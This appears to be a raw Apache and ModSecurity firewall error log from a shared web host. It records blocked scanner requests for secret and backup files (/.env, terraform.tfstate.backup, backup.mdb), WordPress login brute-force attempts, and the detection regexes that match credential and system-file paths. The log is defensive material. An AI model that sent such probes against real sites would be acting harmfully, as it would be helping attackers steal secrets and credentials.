[Tue May 26 13:07:55.232457 2026] [security2:error] [pid 485064:tid 485312] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN0j9tlF55stOmSqEg2wAAAPs"]
[Tue May 26 13:07:56.328252 2026] [security2:error] [pid 485064:tid 485291] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN0z9tlF55stOmSqEhEAAAAOY"]
[Tue May 26 13:07:56.979677 2026] [security2:error] [pid 485064:tid 485251] [client 195.2.79.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVN1D9tlF55stOmSqEhPQAAAL4"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1230859&moderation-hash=2aac02f82ca332a981ba185237eedd5a
[Tue May 26 13:07:57.836450 2026] [security2:error] [pid 485064:tid 485242] [client 195.2.79.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVN1T9tlF55stOmSqEhYQAAALU"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1230859&moderation-hash=2aac02f82ca332a981ba185237eedd5a
[Tue May 26 13:07:58.763715 2026] [security2:error] [pid 485064:tid 485304] [client 113.179.228.236:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahVN1j9tlF55stOmSqEhewAAAPM"]
[Tue May 26 13:07:59.297114 2026] [security2:error] [pid 485064:tid 485209] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN1j9tlF55stOmSqEhlQAAAJQ"]
[Tue May 26 13:08:01.716420 2026] [security2:error] [pid 485064:tid 485230] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN2T9tlF55stOmSqEh5gAAAKk"]
[Tue May 26 13:08:03.583253 2026] [security2:error] [pid 485064:tid 485319] [client 185.191.171.13:57516] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVN2z9tlF55stOmSqEiQwAAAQI"]
[Tue May 26 13:08:03.583352 2026] [security2:error] [pid 485064:tid 485319] [client 185.191.171.13:57516] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVN2z9tlF55stOmSqEiQwAAAQI"]
[Tue May 26 13:08:04.220157 2026] [security2:error] [pid 485064:tid 485216] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN2z9tlF55stOmSqEiSQAAAJs"]
[Tue May 26 13:08:06.564186 2026] [security2:error] [pid 485064:tid 485229] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN3j9tlF55stOmSqEioQAAAKg"]
[Tue May 26 13:08:08.272149 2026] [security2:error] [pid 485064:tid 485290] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN3z9tlF55stOmSqEi8AAAAOU"]
[Tue May 26 13:08:11.257398 2026] [security2:error] [pid 485064:tid 485309] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN4j9tlF55stOmSqEjbgAAAPg"]
[Tue May 26 13:08:12.294099 2026] [security2:error] [pid 485064:tid 485296] [client 176.65.139.237:47712] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "courses.bloggertarget.com"] [uri "/.env"] [unique_id "ahVN5D9tlF55stOmSqEjrQAAAOs"]
[Tue May 26 13:08:13.059172 2026] [security2:error] [pid 485064:tid 485244] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN5D9tlF55stOmSqEjwAAAALc"]
[Tue May 26 13:08:13.631777 2026] [security2:error] [pid 485064:tid 485301] [client 201.182.242.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahVN5T9tlF55stOmSqEj3QAAAPA"]
[Tue May 26 13:08:14.914216 2026] [security2:error] [pid 485064:tid 485252] [client 92.246.140.99:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN5j9tlF55stOmSqEkEQAAAL8"]
[Tue May 26 13:08:16.066369 2026] [security2:error] [pid 485064:tid 485240] [client 47.128.55.217:38424] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.oscpl.co.in"] [uri "/robots.txt"] [unique_id "ahVN6D9tlF55stOmSqEkUQAAALM"]
[Tue May 26 13:08:16.798472 2026] [security2:error] [pid 485064:tid 485242] [client 139.180.231.213:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVN6D9tlF55stOmSqEkbQAAALU"], referer: https://www.anujtradingco.com/
[Tue May 26 13:08:18.390719 2026] [security2:error] [pid 485064:tid 485225] [client 139.180.231.213:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVN6j9tlF55stOmSqEkvAAAAKQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1458685&moderation-hash=8a11f294cf0782f7f63e91da76b5f133
[Tue May 26 13:08:18.433535 2026] [security2:error] [pid 485064:tid 485263] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN6j9tlF55stOmSqEkqgAAAMo"]
[Tue May 26 13:08:20.229564 2026] [security2:error] [pid 485064:tid 485272] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVN7D9tlF55stOmSqElDQAAANM"]
[Tue May 26 13:08:20.340289 2026] [security2:error] [pid 485064:tid 485260] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVN7D9tlF55stOmSqElEwAAAMc"]
[Tue May 26 13:08:20.459753 2026] [security2:error] [pid 485064:tid 485291] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVN7D9tlF55stOmSqElHAAAAOY"]
[Tue May 26 13:08:20.665268 2026] [security2:error] [pid 485064:tid 485152] [remote 146.196.64.107:38732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.64.196.146.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVN7D9tlF55stOmSqElIQAA7lc"]
[Tue May 26 13:08:20.709170 2026] [security2:error] [pid 485064:tid 485203] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN7D9tlF55stOmSqElGQAAAI4"]
[Tue May 26 13:08:20.971936 2026] [security2:error] [pid 485064:tid 485196] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVN7D9tlF55stOmSqElOwAAAIc"]
[Tue May 26 13:08:21.463819 2026] [security2:error] [pid 485064:tid 485294] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVN7T9tlF55stOmSqElUQAAAOk"]
[Tue May 26 13:08:23.150061 2026] [security2:error] [pid 485064:tid 485274] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN7j9tlF55stOmSqEliQAAANU"]
[Tue May 26 13:08:23.399418 2026] [security2:error] [pid 485064:tid 485246] [client 139.180.231.213:60521] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVN7j9tlF55stOmSqElkQAAALk"], referer: https://anujtradingco.com
[Tue May 26 13:08:25.544012 2026] [security2:error] [pid 485064:tid 485282] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN8T9tlF55stOmSqEl5gAAAN0"]
[Tue May 26 13:08:26.495775 2026] [security2:error] [pid 485064:tid 485237] [client 74.7.228.30:52668] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "www.payment.pdrwebsolutions.cloud"] [uri "/robots.txt"] [unique_id "ahVN8j9tlF55stOmSqEmJgAAsHA"]
[Tue May 26 13:08:26.576244 2026] [security2:error] [pid 485064:tid 485207] [client 74.7.228.30:52668] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.payment.pdrwebsolutions.cloud"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "ahVN8j9tlF55stOmSqEmJwAAkgk"], referer: https://www.payment.pdrwebsolutions.cloud/robots.txt
[Tue May 26 13:08:27.754919 2026] [security2:error] [pid 485064:tid 485258] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN8z9tlF55stOmSqEmTAAAAMU"]
[Tue May 26 13:08:29.483451 2026] [security2:error] [pid 485064:tid 485308] [client 136.158.56.187:30591] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.56.158.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/xmlrpc.php"] [unique_id "ahVN9T9tlF55stOmSqEmoQAAAPc"]
[Tue May 26 13:08:29.483714 2026] [security2:error] [pid 485064:tid 485308] [client 136.158.56.187:30591] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "jailanitradingcompany.com"] [uri "/xmlrpc.php"] [unique_id "ahVN9T9tlF55stOmSqEmoQAAAPc"]
[Tue May 26 13:08:30.289742 2026] [security2:error] [pid 485064:tid 485208] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN9T9tlF55stOmSqEmtwAAAJM"]
[Tue May 26 13:08:31.817534 2026] [security2:error] [pid 485064:tid 485196] [client 136.158.56.187:30783] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.56.158.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/xmlrpc.php"] [unique_id "ahVN9z9tlF55stOmSqEnCAAAAIc"]
[Tue May 26 13:08:31.817796 2026] [security2:error] [pid 485064:tid 485196] [client 136.158.56.187:30783] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "jailanitradingcompany.com"] [uri "/xmlrpc.php"] [unique_id "ahVN9z9tlF55stOmSqEnCAAAAIc"]
[Tue May 26 13:08:31.908103 2026] [security2:error] [pid 485064:tid 485223] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN9z9tlF55stOmSqEm_AAAAKI"]
[Tue May 26 13:08:34.445009 2026] [security2:error] [pid 485064:tid 485315] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN-T9tlF55stOmSqEnbwAAAP4"]
[Tue May 26 13:08:36.530975 2026] [security2:error] [pid 485064:tid 485209] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN_D9tlF55stOmSqEnvQAAAJQ"]
[Tue May 26 13:08:39.599939 2026] [security2:error] [pid 485064:tid 485268] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN_z9tlF55stOmSqEoMQAAAM8"]
[Tue May 26 13:08:39.956436 2026] [security2:error] [pid 485064:tid 485219] [client 108.136.131.13:55684] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "cpcalendars.contabilidadecarioca.com.br"] [uri "/filemanager/dialog.php"] [unique_id "ahVN_z9tlF55stOmSqEoVwAAAJ4"]
[Tue May 26 13:08:40.524158 2026] [security2:error] [pid 485064:tid 485267] [client 113.178.171.155:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOAD9tlF55stOmSqEoYwAAAM4"]
[Tue May 26 13:08:41.336010 2026] [security2:error] [pid 485064:tid 485068] [remote 47.251.53.97:56604] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.53.251.47.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVOAT9tlF55stOmSqEohAAA8AM"]
[Tue May 26 13:08:41.858267 2026] [security2:error] [pid 485064:tid 485246] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOAT9tlF55stOmSqEokQAAALk"]
[Tue May 26 13:08:44.141017 2026] [security2:error] [pid 485064:tid 485320] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOAz9tlF55stOmSqEo6AAAAQM"]
[Tue May 26 13:08:45.853054 2026] [security2:error] [pid 485064:tid 485313] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOBT9tlF55stOmSqEpHQAAAPw"]
[Tue May 26 13:08:48.809955 2026] [security2:error] [pid 485064:tid 485280] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOCD9tlF55stOmSqEppQAAANs"]
[Tue May 26 13:08:50.583278 2026] [security2:error] [pid 485064:tid 485208] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOCj9tlF55stOmSqEp6wAAAJM"]
[Tue May 26 13:08:50.632883 2026] [security2:error] [pid 485064:tid 485147] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/terraform.tfstate.backup"] [unique_id "ahVOCj9tlF55stOmSqEp_gAA2lI"]
[Tue May 26 13:08:53.402387 2026] [security2:error] [pid 485064:tid 485271] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVODD9tlF55stOmSqEqTQAAANI"]
[Tue May 26 13:08:55.748814 2026] [security2:error] [pid 485064:tid 485225] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVODz9tlF55stOmSqEqqwAAAKQ"]
[Tue May 26 13:08:56.024402 2026] [security2:error] [pid 485064:tid 485084] [remote 51.79.229.9:37162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.229.79.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVODz9tlF55stOmSqEqwQAAuhM"]
[Tue May 26 13:08:56.919406 2026] [proxy:error] [pid 485064:tid 485091] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:08:56.919452 2026] [proxy_http:error] [pid 485064:tid 485091] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:08:56.920073 2026] [proxy:error] [pid 485064:tid 485091] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:08:56.920105 2026] [proxy_http:error] [pid 485064:tid 485091] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:08:58.158872 2026] [security2:error] [pid 485064:tid 485106] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.mdb$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1282"] [id "390589"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .mdb)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/backup.mdb"] [unique_id "ahVOEj9tlF55stOmSqErCwAA9yk"]
[Tue May 26 13:08:58.186600 2026] [security2:error] [pid 485064:tid 485268] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOET9tlF55stOmSqEq9gAAAM8"]
[Tue May 26 13:08:58.296176 2026] [security2:error] [pid 485064:tid 485208] [client 43.172.194.99:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVOEj9tlF55stOmSqErDgAAAJM"]
[Tue May 26 13:08:59.823471 2026] [security2:error] [pid 485064:tid 485272] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOEz9tlF55stOmSqErLwAAANM"]
[Tue May 26 13:09:01.228740 2026] [security2:error] [pid 485064:tid 485302] [client 91.196.152.133:58451] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.prototypecommune.azurmediatec.com"] [uri "/index.php"] [unique_id "ahVOFD9tlF55stOmSqErRAAAAPE"]
[Tue May 26 13:09:02.174868 2026] [security2:error] [pid 485064:tid 485262] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOFT9tlF55stOmSqErfAAAAMk"]
[Tue May 26 13:09:02.232740 2026] [security2:error] [pid 485064:tid 485185] [remote 110.249.201.79:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "kingsclub.in"] [uri "/robots.txt"] [unique_id "ahVOFj9tlF55stOmSqEriQAA1Hg"]
[Tue May 26 13:09:02.666796 2026] [proxy:error] [pid 485064:tid 485135] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:09:02.666849 2026] [proxy_http:error] [pid 485064:tid 485135] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:09:02.667421 2026] [proxy:error] [pid 485064:tid 485135] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:09:02.667453 2026] [proxy_http:error] [pid 485064:tid 485135] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
